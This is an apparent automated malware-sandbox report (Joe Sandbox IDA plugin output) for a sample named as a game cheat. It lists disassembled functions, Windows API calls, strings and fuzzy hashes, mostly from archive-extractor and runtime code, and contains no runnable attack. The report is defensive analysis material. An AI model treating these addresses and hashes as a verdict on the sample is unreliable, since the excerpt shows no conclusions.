                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                    • Instruction ID: 36a5c2f6c296537817abb8c64d8a7e866b6d2cd31c9d889903f5b69a254c8f3b
                                                    • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                    • Instruction Fuzzy Hash: 6831E6B1A147468FCB18DF14C85126AFBE0FB95304F14462DE5C9C7381C774EA0ACBA2
                                                    Function 00CFE2E8 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _swprintf.LIBCMT ref: 00CFE30E
                                                      • Part of subcall function 00CF4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CF40A5
                                                      • Part of subcall function 00D01DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00D31030,00000200,00CFD928,00000000,?,00000050,00D31030), ref: 00D01DC4
                                                    • _strlen.LIBCMT ref: 00CFE32F
                                                    • SetDlgItemTextW.USER32(?,00D2E274,?), ref: 00CFE38F
                                                    • GetWindowRect.USER32(?,?), ref: 00CFE3C9
                                                    • GetClientRect.USER32(?,?), ref: 00CFE3D5
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00CFE475
                                                    • GetWindowRect.USER32(?,?), ref: 00CFE4A2
                                                    • SetWindowTextW.USER32(?,?), ref: 00CFE4DB
                                                    • GetSystemMetrics.USER32(00000008), ref: 00CFE4E3
                                                    • GetWindow.USER32(?,00000005), ref: 00CFE4EE
                                                    • GetWindowRect.USER32(00000000,?), ref: 00CFE51B
                                                    • GetWindow.USER32(00000000,00000002), ref: 00CFE58D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                    • String ID: $%s:$CAPTION$d
                                                    • API String ID: 2407758923-2512411981
                                                    • Opcode ID: 2191d399ebce5f2b89d67df711a5c7f42bcdb42e8dbf54b05aa1a2359b3cfed6
                                                    • Instruction ID: f2832880dd96d05fbe4a76f150507844257003843ee070559e8c669da16cf1fe
                                                    • Opcode Fuzzy Hash: 2191d399ebce5f2b89d67df711a5c7f42bcdb42e8dbf54b05aa1a2359b3cfed6
                                                    • Instruction Fuzzy Hash: AF81A171208305AFD710DFB8CC89E6FBBE9EB88744F04091DFA95D7260D630E9098B62
                                                    Function 00D1CB22 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • ___free_lconv_mon.LIBCMT ref: 00D1CB66
                                                      • Part of subcall function 00D1C701: _free.LIBCMT ref: 00D1C71E
                                                      • Part of subcall function 00D1C701: _free.LIBCMT ref: 00D1C730
                                                      • Part of subcall function 00D1C701: _free.LIBCMT ref: 00D1C742
                                                      • Part of subcall function 00D1C701: _free.LIBCMT ref: 00D1C754
                                                      • Part of subcall function 00D1C701: _free.LIBCMT ref: 00D1C766
                                                      • Part of subcall function 00D1C701: _free.LIBCMT ref: 00D1C778
                                                      • Part of subcall function 00D1C701: _free.LIBCMT ref: 00D1C78A
                                                      • Part of subcall function 00D1C701: _free.LIBCMT ref: 00D1C79C
                                                      • Part of subcall function 00D1C701: _free.LIBCMT ref: 00D1C7AE
                                                      • Part of subcall function 00D1C701: _free.LIBCMT ref: 00D1C7C0
                                                      • Part of subcall function 00D1C701: _free.LIBCMT ref: 00D1C7D2
                                                      • Part of subcall function 00D1C701: _free.LIBCMT ref: 00D1C7E4
                                                      • Part of subcall function 00D1C701: _free.LIBCMT ref: 00D1C7F6
                                                    • _free.LIBCMT ref: 00D1CB5B
                                                      • Part of subcall function 00D18DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00D1C896,00D23A34,00000000,00D23A34,00000000,?,00D1C8BD,00D23A34,00000007,00D23A34,?,00D1CCBA,00D23A34), ref: 00D18DE2
                                                      • Part of subcall function 00D18DCC: GetLastError.KERNEL32(00D23A34,?,00D1C896,00D23A34,00000000,00D23A34,00000000,?,00D1C8BD,00D23A34,00000007,00D23A34,?,00D1CCBA,00D23A34,00D23A34), ref: 00D18DF4
                                                    • _free.LIBCMT ref: 00D1CB7D
                                                    • _free.LIBCMT ref: 00D1CB92
                                                    • _free.LIBCMT ref: 00D1CB9D
                                                    • _free.LIBCMT ref: 00D1CBBF
                                                    • _free.LIBCMT ref: 00D1CBD2
                                                    • _free.LIBCMT ref: 00D1CBE0
                                                    • _free.LIBCMT ref: 00D1CBEB
                                                    • _free.LIBCMT ref: 00D1CC23
                                                    • _free.LIBCMT ref: 00D1CC2A
                                                    • _free.LIBCMT ref: 00D1CC47
                                                    • _free.LIBCMT ref: 00D1CC5F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                    • String ID:
                                                    • API String ID: 161543041-0
                                                    • Opcode ID: 7072f9028148f70e5dd8f336c3f944f198daa960863320c41c8b2c6ff836d2f1
                                                    • Instruction ID: f2b4b845a71457f3b457b5c5d24aefa9f95f28e1320760f3a09bdeb67adb5482
                                                    • Opcode Fuzzy Hash: 7072f9028148f70e5dd8f336c3f944f198daa960863320c41c8b2c6ff836d2f1
                                                    • Instruction Fuzzy Hash: FA313731654305BFEB20AA78F946B9AB7E9EF10310F186429E198D6192DF35ECC0DA70
                                                    Function 00D09711 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 126memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _wcslen.LIBCMT ref: 00D09736
                                                    • _wcslen.LIBCMT ref: 00D097D6
                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00D097E5
                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00D09806
                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00D0982D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                    • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                    • API String ID: 1777411235-4209811716
                                                    • Opcode ID: 7ca7205932d02034484b9d7f510f7fc4ed00e5fbbab00d61cded18bfb74a6218
                                                    • Instruction ID: c1740e2b4c2f54a9db25861e1a79dac9917a7d56367a1ce3a3c8da192db9a611
                                                    • Opcode Fuzzy Hash: 7ca7205932d02034484b9d7f510f7fc4ed00e5fbbab00d61cded18bfb74a6218
                                                    • Instruction Fuzzy Hash: 873128326083117FD725AB34AC06FABB7ACDF92320F14411DF905962D3EF649A4983B5
                                                    Function 00D0D69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetWindow.USER32(?,00000005), ref: 00D0D6C1
                                                    • GetClassNameW.USER32(00000000,?,00000800), ref: 00D0D6ED
                                                      • Part of subcall function 00D01FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00CFC116,00000000,.exe,?,?,00000800,?,?,?,00D08E3C), ref: 00D01FD1
                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00D0D709
                                                    • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00D0D720
                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 00D0D734
                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00D0D75D
                                                    • DeleteObject.GDI32(00000000), ref: 00D0D764
                                                    • GetWindow.USER32(00000000,00000002), ref: 00D0D76D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                    • String ID: STATIC
                                                    • API String ID: 3820355801-1882779555
                                                    • Opcode ID: 3e1965b1bcf3b2c0160140f09d1ce1a66aaafb233fd4b23a73c1951bfd1f90d5
                                                    • Instruction ID: 377d5af542c2c440d644724f7328502e352057f0245e21077521264b3df827e4
                                                    • Opcode Fuzzy Hash: 3e1965b1bcf3b2c0160140f09d1ce1a66aaafb233fd4b23a73c1951bfd1f90d5
                                                    • Instruction Fuzzy Hash: E71156326407107BE621ABB89C4AFAF765DEF80792F044122FE0AE21D2DB64CF0546B5
                                                    Function 00D196F1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _free.LIBCMT ref: 00D19705
                                                      • Part of subcall function 00D18DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00D1C896,00D23A34,00000000,00D23A34,00000000,?,00D1C8BD,00D23A34,00000007,00D23A34,?,00D1CCBA,00D23A34), ref: 00D18DE2
                                                      • Part of subcall function 00D18DCC: GetLastError.KERNEL32(00D23A34,?,00D1C896,00D23A34,00000000,00D23A34,00000000,?,00D1C8BD,00D23A34,00000007,00D23A34,?,00D1CCBA,00D23A34,00D23A34), ref: 00D18DF4
                                                    • _free.LIBCMT ref: 00D19711
                                                    • _free.LIBCMT ref: 00D1971C
                                                    • _free.LIBCMT ref: 00D19727
                                                    • _free.LIBCMT ref: 00D19732
                                                    • _free.LIBCMT ref: 00D1973D
                                                    • _free.LIBCMT ref: 00D19748
                                                    • _free.LIBCMT ref: 00D19753
                                                    • _free.LIBCMT ref: 00D1975E
                                                    • _free.LIBCMT ref: 00D1976C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: 4a72130096a03326e156d5f70d518fbfc2bbb566a758f3595e4df445084e50fd
                                                    • Instruction ID: 6de9d4844d2dcacd8c5f07782dcdf05ccb387f59b8082304e9a9bfa41c08b03c
                                                    • Opcode Fuzzy Hash: 4a72130096a03326e156d5f70d518fbfc2bbb566a758f3595e4df445084e50fd
                                                    • Instruction Fuzzy Hash: 3711A775510209BFCB01EF54F852CD93B75EF14350B5154A5FA084F262DF31EA90ABA4
                                                    Function 00D12E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                    • String ID: csm$csm$csm
                                                    • API String ID: 322700389-393685449
                                                    • Opcode ID: 7d0b6a68a126dd9c06bb88d8cc9e7fcc804f7f799ab7022cbe89e1e36b2a3882
                                                    • Instruction ID: d7a1c33d3e77809a2bdff5405f9b1c405139c74e54a44e607afbae8b2e376f26
                                                    • Opcode Fuzzy Hash: 7d0b6a68a126dd9c06bb88d8cc9e7fcc804f7f799ab7022cbe89e1e36b2a3882
                                                    • Instruction Fuzzy Hash: C1B12771900209BFCF25DFA4E8819EEBBB5EF14310F184159E8156B212DB75DAE2CBB1
                                                    Function 00CF6FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CF6FAA
                                                    • _wcslen.LIBCMT ref: 00CF7013
                                                    • _wcslen.LIBCMT ref: 00CF7084
                                                      • Part of subcall function 00CF7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00CF7AAB
                                                      • Part of subcall function 00CF7A9C: GetLastError.KERNEL32 ref: 00CF7AF1
                                                      • Part of subcall function 00CF7A9C: CloseHandle.KERNEL32(?), ref: 00CF7B00
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                    • API String ID: 3122303884-3508440684
                                                    • Opcode ID: 8fd92e3b1dbe73f6289ec5cee827d323ee273705e2d20fdc864ce70140be5873
                                                    • Instruction ID: 3a89e228cf68fb41e0b288f98b40e136ec1439c2646a5c545f7aaf285b8d021a
                                                    • Opcode Fuzzy Hash: 8fd92e3b1dbe73f6289ec5cee827d323ee273705e2d20fdc864ce70140be5873
                                                    • Instruction Fuzzy Hash: E641E7B1D0834CBAEB60E7709C46FFEB76C9F14344F004555FB59A6182DA74AB889632
                                                    Function 00D0B5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00CF1316: GetDlgItem.USER32(00000000,00003021), ref: 00CF135A
                                                      • Part of subcall function 00CF1316: SetWindowTextW.USER32(00000000,00D235F4), ref: 00CF1370
                                                    • EndDialog.USER32(?,00000001), ref: 00D0B610
                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 00D0B637
                                                    • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00D0B650
                                                    • SetWindowTextW.USER32(?,?), ref: 00D0B661
                                                    • GetDlgItem.USER32(?,00000065), ref: 00D0B66A
                                                    • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00D0B67E
                                                    • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00D0B694
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Item$TextWindow$Dialog
                                                    • String ID: LICENSEDLG
                                                    • API String ID: 3214253823-2177901306
                                                    • Opcode ID: 1399b30cd961cecb84ac97a921ed0ad310ec351cd63d36e58c9ae5c3f544690c
                                                    • Instruction ID: 2402908f8ba2bf4eb011cd9811e6cde864a592891deb58ae8eab7c538ca5b727
                                                    • Opcode Fuzzy Hash: 1399b30cd961cecb84ac97a921ed0ad310ec351cd63d36e58c9ae5c3f544690c
                                                    • Instruction Fuzzy Hash: FA21F931608305BBD2115F75EC89F3B3B6DEB47BA2F450015FA48DA2E0CB5399019635
                                                    Function 00D0FD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,6B1316D7,00000001,00000000,00000000,?,?,00CFAF6C,ROOT\CIMV2), ref: 00D0FD99
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00CFAF6C,ROOT\CIMV2), ref: 00D0FE14
                                                    • SysAllocString.OLEAUT32(00000000), ref: 00D0FE1F
                                                    • _com_issue_error.COMSUPP ref: 00D0FE48
                                                    • _com_issue_error.COMSUPP ref: 00D0FE52
                                                    • GetLastError.KERNEL32(80070057,6B1316D7,00000001,00000000,00000000,?,?,00CFAF6C,ROOT\CIMV2), ref: 00D0FE57
                                                    • _com_issue_error.COMSUPP ref: 00D0FE6A
                                                    • GetLastError.KERNEL32(00000000,?,?,00CFAF6C,ROOT\CIMV2), ref: 00D0FE80
                                                    • _com_issue_error.COMSUPP ref: 00D0FE93
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                    • String ID:
                                                    • API String ID: 1353541977-0
                                                    • Opcode ID: 5cb5bf8f7e04270d5178481a633dde69a5d9e9d91bb9b650addd399261da7932
                                                    • Instruction ID: 7e50961c128f0410328a699cf76d5e61868793bb40204dd1529b0bb9123fe826
                                                    • Opcode Fuzzy Hash: 5cb5bf8f7e04270d5178481a633dde69a5d9e9d91bb9b650addd399261da7932
                                                    • Instruction Fuzzy Hash: A041E771A00319ABDB209F69DC45BAEBBA8EB44710F344239F909E77D1DB3499418BB4
                                                    Function 00CFAF24 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                    • API String ID: 3519838083-3505469590
                                                    • Opcode ID: c3fc84732d87c8feb686e0133d601cbad625db2e8a1a6d2b2f376ecdefad9358
                                                    • Instruction ID: 1a97140c0b9478d2a3e324918ac716a9aba1714ee02e0fab138981833ba77625
                                                    • Opcode Fuzzy Hash: c3fc84732d87c8feb686e0133d601cbad625db2e8a1a6d2b2f376ecdefad9358
                                                    • Instruction Fuzzy Hash: 12715AB1A00219EFDB14DFA4DC95DBEB7B9FF48314B140159E616E72A0CB34AE42CB61
                                                    Function 00CF9382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CF9387
                                                    • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00CF93AA
                                                    • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00CF93C9
                                                      • Part of subcall function 00CFC29A: _wcslen.LIBCMT ref: 00CFC2A2
                                                      • Part of subcall function 00D01FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00CFC116,00000000,.exe,?,?,00000800,?,?,?,00D08E3C), ref: 00D01FD1
                                                    • _swprintf.LIBCMT ref: 00CF9465
                                                      • Part of subcall function 00CF4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CF40A5
                                                    • MoveFileW.KERNEL32(?,?), ref: 00CF94D4
                                                    • MoveFileW.KERNEL32(?,?), ref: 00CF9514
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                    • String ID: rtmp%d
                                                    • API String ID: 3726343395-3303766350
                                                    • Opcode ID: 4a1c29170b9393003c175a56e211a0ae3eeab197234a961e1b744f39b5488e9a
                                                    • Instruction ID: 62c4d3f5c8c97310bc902784c286e555389aab334baa648148391dc6e6561e74
                                                    • Opcode Fuzzy Hash: 4a1c29170b9393003c175a56e211a0ae3eeab197234a961e1b744f39b5488e9a
                                                    • Instruction Fuzzy Hash: 354193B190025CA6DFA1ABA0CD55FFE737CEF51340F0048A5B719E3151DA388B89AB71
                                                    Function 00D01218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __aulldiv.LIBCMT ref: 00D0122E
                                                      • Part of subcall function 00CFB146: GetVersionExW.KERNEL32(?), ref: 00CFB16B
                                                    • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00D01251
                                                    • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00D01263
                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00D01274
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D01284
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D01294
                                                    • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00D012CF
                                                    • __aullrem.LIBCMT ref: 00D01379
